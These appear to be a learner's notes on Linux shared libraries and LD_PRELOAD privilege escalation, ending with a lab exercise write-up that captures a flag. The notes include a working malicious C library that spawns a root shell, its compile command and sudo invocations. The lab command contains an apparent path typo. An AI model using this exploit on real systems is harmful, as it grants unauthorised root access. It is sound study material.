# Intro - Very common for Linux binaries to use dynamically linked shared object libraries - Libraries contain compiled code or other data that developers use to avoid having to re-write the same pieces of code across multiple programs - Two types of libraries exist in Linux: - `static libraries` - denoted by the `.a` file extension - `dynamically linked shared object libraries` - denoted by the `.so` file extension - When a program is compiled, static libraries become part of the program and can not be altered - In contrast, dynamic libraries can be modified to control the execution of the program that calls them ## Dynamic Library Enum - Multiple methods exist for specifying the location of dynamic libraries, so the system will know where to look for them on program execution - This includes: - using `-rpath` or `-rpath-link` flags when compiling a program - using env vars `LD_RUN_PATH` or `LD_LIBRARY_PATH` - placing libraries in the `/lib` or `/usr/lib` default directories - specifying another directory containing the libraries within the `/etc/ld.so.conf` config file - Additionally, the `LD_PRELOAD` env var can be used to load a library before executing a binary - The functions from this library are given preference over the default ones - The shared objects required by a binary can be viewed using the `ldd` utility - Below we use the `ldd` command to see the `.so` files (and the associated absolute paths) for the `ls` binary ```bash ldd /bin/ls linux-vdso.so.1 => (0x00007fff03bc7000) libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f4186288000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4185ebe000) libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007f4185c4e000) libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f4185a4a000) /lib64/ld-linux-x86-64.so.2 (0x00007f41864aa000) libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f418582d000) ``` # `LD_PRELOAD` Privesc - First, enum the current user's sudo privs ```bash sudo -l Matching Defaults entries for daniel.carter on NIX02: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD User daniel.carter may run the following commands on NIX02: (root) NOPASSWD: /usr/sbin/apache2 restart ``` - While there is no privesc vector with `apache2` restart abilities per GTFOBins, we see that the `env_keep+=LD_PRELOAD` is included in `$PATH` - We can restart the `apache2` bin and use `LD_PRELOAD` to run a malicious library prior to `apache2` - First, create the below below library to exploit `LD_PRELOAD` ```c #include <stdio.h> #include <sys/types.h> #include <stdlib.h> #include <unistd.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } ``` - Next, compile the new library ```bash gcc -fPIC -shared -o root.so root.c -nostartfiles ``` - Finally, use the below command to restart `apache2` and load the malicious library - NOTE: Absolute paths must be specified ```bash sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart ``` --- # Exercise - `ping` test ![[images/Pasted image 20260211193021.png]] - `nmap` scans ![[images/Pasted image 20260211195756.png]] - `ssh` into target with given creds - light internal enum on target ![[images/Pasted image 20260211193142.png]] - `ld_preload` is set and we can run `openssl` as root ## Exploit `ld_preload` - create malicious file on target ![[images/Pasted image 20260211193346.png]] - compile malicious file into a library ![[images/Pasted image 20260211193431.png]] - run with below command ```bash sudo LD_PRELOAD=,/root.so /usr/bin/openssl ``` - privesc worked! ![[images/Pasted image 20260211193553.png]] - navigate to `/root/ld_preload` and `cat` flag ![[images/Pasted image 20260211193652.png]]